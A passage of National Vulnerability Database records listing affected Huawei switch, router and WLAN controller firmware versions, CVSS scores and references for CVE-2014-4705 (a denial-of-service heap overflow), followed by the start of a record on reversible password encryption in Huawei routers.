                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EF569A6-82D6-4B5B-8CC8-02A285AD4D32",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "2FBFFA36-EE4D-4DB6-85BC-F74103A2E2A8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "EE93B2B8-FCEA-4831-8E17-FC10131A2369",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "F0E81740-CD29-427B-8B4D-D7BC70102E4D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "4129EE01-D445-4A19-A905-8E508F576D3D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCDA5EA6-AB59-4253-8967-26DA1652CD3F",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar1200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D4BA4150-8CA8-48BF-9D45-ABC8AC710060",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "F254A80C-6A4E-4A5F-BEEF-F12AC43E8128",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "22A2F833-98BB-40E9-A5A9-B3B92F0C01E8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "A0D079CA-9349-4F80-92DC-E350EBC27A9F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A5CD805-B40D-48E5-865A-21BB22627A1F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "F17BB5B4-077D-4F8E-A3F9-802817E128D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "46C9D4ED-FC65-495B-95EB-8F904B98606B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar2200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "A117033D-5A6F-4CD7-A017-09DDFCD3DDCE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar2200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "50662078-4827-4706-AE29-170E2239C5AE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "EE35DC1B-6F04-4796-850E-EB7311344DBC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "7279FD32-01DE-4CD0-BEA1-622D40F1240D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "BAC9B725-8D20-476F-B49E-A0E3A82881B7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "6A08EEE2-52B6-4023-875D-C4D45598B04C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "6F005EFD-7F00-4A25-804D-BE2E7C88C237",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "ACE31F6A-AE83-4EF4-AED3-49F4E6D687D5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "E0A674FC-2891-4A81-BB11-BB586A3F8372",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar3200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "9309E1AA-0C4E-422C-9307-A8DD0AE5D576",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "26F121C9-1BE9-4734-8B13-B3A54B027B6D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1771F14-BDA7-49C7-9D3D-A302C4C2CA22",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "13ECBDBC-15B8-475C-A204-9CAD825F4824",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DEB16FD0-D560-4565-923B-B6DC1BE850ED",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "C5A46497-0365-4F6C-BAAE-5C2D5F80D166",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "6890F3D6-4692-4316-84E2-32E9CF31C5FE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar530_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "3B15618E-773C-47BB-9476-8E71E2931769",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar530:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA0A0C5-5956-424C-AA57-12E9DE30B956",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "4169C33E-ED1E-4824-B700-46DD9AF15404",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "751CB51E-4199-4293-9456-7F1F4D524F3E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "A0C25FF4-2E02-4C19-836B-FEC277239EE4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "678CDD2F-C220-4D97-96C4-80896EBF9264",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "6DF6B3C0-2A0F-45AB-A181-CCC24A63C397",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "A0373872-7A22-4D95-AD86-2C9660F38E08",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "192E86F0-A53E-49CD-9CC6-37C7EC38FB96",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:netengine16ex:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E6224ECC-6949-4204-94D1-C7374C142A50",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C8D83A7-4EE9-4219-A60A-27A34BD1728F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "8D82BBF0-410B-401C-8547-51BEB7D316A3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "FA0607AD-61D1-4CA8-9C88-AEE97CB19001",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "C38C50B3-FED4-477B-9F4B-48272FA4B2F6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "E886101F-0DB8-4F4E-979E-DC4AD9097BDF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "096DB6E6-240F-4147-96F2-B943514E71CC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg1300_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "17AD622B-396B-47F5-8832-F6B4DC5405BC",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:srg1300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "CF77FB70-AAF3-421E-8D9B-F0C54E6A2FC0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "CDEC640B-818D-465D-ADC4-1B04F1CB3003",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "B35A8241-8722-416B-A2B7-58119AC81EBC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "503914FC-703E-44F5-AE7E-DB9B97C8258F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "14B72192-5C81-441A-8788-55127D65D34F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "20F8112E-1892-4705-BF21-1720A1719681",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "595546F2-E729-431E-9CDE-C2E67CD4A02F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg2300_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "6500362D-D2F0-4363-A406-18D25A53B2B8",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:srg2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "9BAF601C-B8EC-42F5-95F4-274F8492F57E",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "7E05D6D4-CCA3-429C-B716-EB0E718AF450",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "C4E1601C-5803-4035-8C59-844E50BC0947",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "B45ECACF-E367-4AC0-8439-7D1B4D4E0A73",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "C6A90D53-A06B-4385-935C-90500A1768BF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "59ACBB59-6FE8-44F9-B2AD-463E0FCC9E1A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "FE48F320-5E46-4951-BDB6-C5BBAACC6B45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:srg3300_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "9DF5E8BA-FFB7-4724-A85E-195DCB31A908",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:srg3300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "43681AE7-5C12-4772-85A9-0A10177C6CFD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "3020A841-8AC7-4683-82CE-420F56507516",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "06130B76-14ED-4333-BB1A-3F54883F7730",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "A626747D-05B9-4B3D-A1A2-3A14F0CE3E12",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCA19134-A9EE-4E99-BF5C-E3CF9C0B8B55",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "14D0861B-BED2-4C74-92B7-363FD598B70F",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:wlan_ac6005:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DF84D689-7852-4441-B73C-D0A7FA9A4E6A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB400854-8129-4887-9B45-4EBE31AEE2FB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "A1E887F0-EDAC-4839-9BE5-ABCCBDFC0C5B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "9458DF46-C496-4976-8A08-4C25902F41DE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EC8DFB3-1576-4491-8A71-754B941B6BB9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "A34A1F8B-76F9-4419-8B80-8C49BA84732C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:wlan_ac6605:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "251596D6-98C5-4CDF-9808-177AD2E51C15",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:wlan_acu2_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "4CB358CA-11A9-4A33-AF9D-6C7D681EC177",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:wlan_acu2:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B9401915-9621-4C43-A668-E7F0B1487A29",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet.",
      },
      {
         lang: "es",
         value: "Múltiples desbordamientos de búfer basados en memoria dinámica (heap) en la plataforma de software en los switches Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300 y S6700 series; los routers AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300 y SRG3300 series; y los controladores de acceso WLAN AC6005, AC6605 y ACU2 permiten que atacantes remotos provoquen una denegación de servicio (reinicio del dispositivo) mediante un campo length manipulado en un paquete.",
      },
   ],
   id: "CVE-2014-4705",
   lastModified: "2024-11-21T02:10:45.170",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2018-01-30T17:29:00.227",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Permissions Required",
         ],
         url: "http://secunia.com/advisories/59349",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Permissions Required",
         ],
         url: "http://secunia.com/advisories/59349",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-119",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2016-10-03 21:59
Modified
2025-04-12 10:46
Summary
Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm.
Impacted products
Vendor Product Version
huawei s9300_firmware v200r005c00spc300
huawei s9300_firmware v200r006c00spc500
huawei s9300 -
huawei s12700_firmware v200r005c00
huawei s12700_firmware v200r006c00
huawei s12700 -
huawei quidway_s9300_firmware v200r001c00spc300
huawei quidway_s9300_firmware v200r002c00spc100
huawei quidway_s9300_firmware v200r003c00spc500
huawei quidway_s9300 -
huawei ar_firmware v200r001
huawei ar_firmware v200r002
huawei ar_firmware v200r003
huawei ar_firmware v200r005c10
huawei ar_firmware v200r005c20
huawei ar_firmware v200r005c30
huawei ar -
huawei quidway_s5300_firmware v200r001c00spc300
huawei quidway_s5300 -
huawei s5700_firmware v200r001c00
huawei s5700_firmware v200r002c00
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r006c00
huawei s5700 -
huawei s5300_firmware v200r002c00
huawei s5300_firmware v200r005c00spc500
huawei s5300_firmware v200r006c00spc500
huawei s5300 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "A066F4B8-2258-4ED2-A166-02FCA7C9F3A7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDA38762-CACE-403B-8DE5-42E0306FEB28",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D81469B-EC6C-493D-B632-4DF821A1F304",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D6F2C4C7-3438-42B8-8999-C17E45C8CF49",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DB8B2442-4A0E-4C7A-8D21-A1E09BD1A204",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "3022A5BA-DD0D-47D8-8EFA-A617743C133A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "7B2FFB6E-1895-4796-B445-4A4193DEFEAE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2E756FE8-F106-4BFD-B33B-CC198363D2FD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "0A265FD5-0984-4698-97EB-2904C289561D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "EFF757E5-F689-49CF-9972-ED5A3D825891",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "08EAB0B6-9363-4632-814A-D51DD3087346",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r005c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "65081FFE-ECBD-42EE-885A-7E29AB844FBC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r005c20:*:*:*:*:*:*:*",
                     matchCriteriaId: "5356CB25-52E6-4786-B024-07F7B53E00A7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r005c30:*:*:*:*:*:*:*",
                     matchCriteriaId: "53A40184-F3A0-472C-B4DE-7AD6D73BEA17",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D1D2EB9C-FA8B-4B3F-89BE-AC2611EE4373",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "B5B529C9-04F5-48C3-9346-C7E0104ED0C8",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "4C872196-628D-42A2-AC58-69CD8784CE5D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "336AA440-AEF4-482B-A037-8976DC38BA1A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3B2DE9FE-5EC9-462E-86F0-EE772C944DFC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
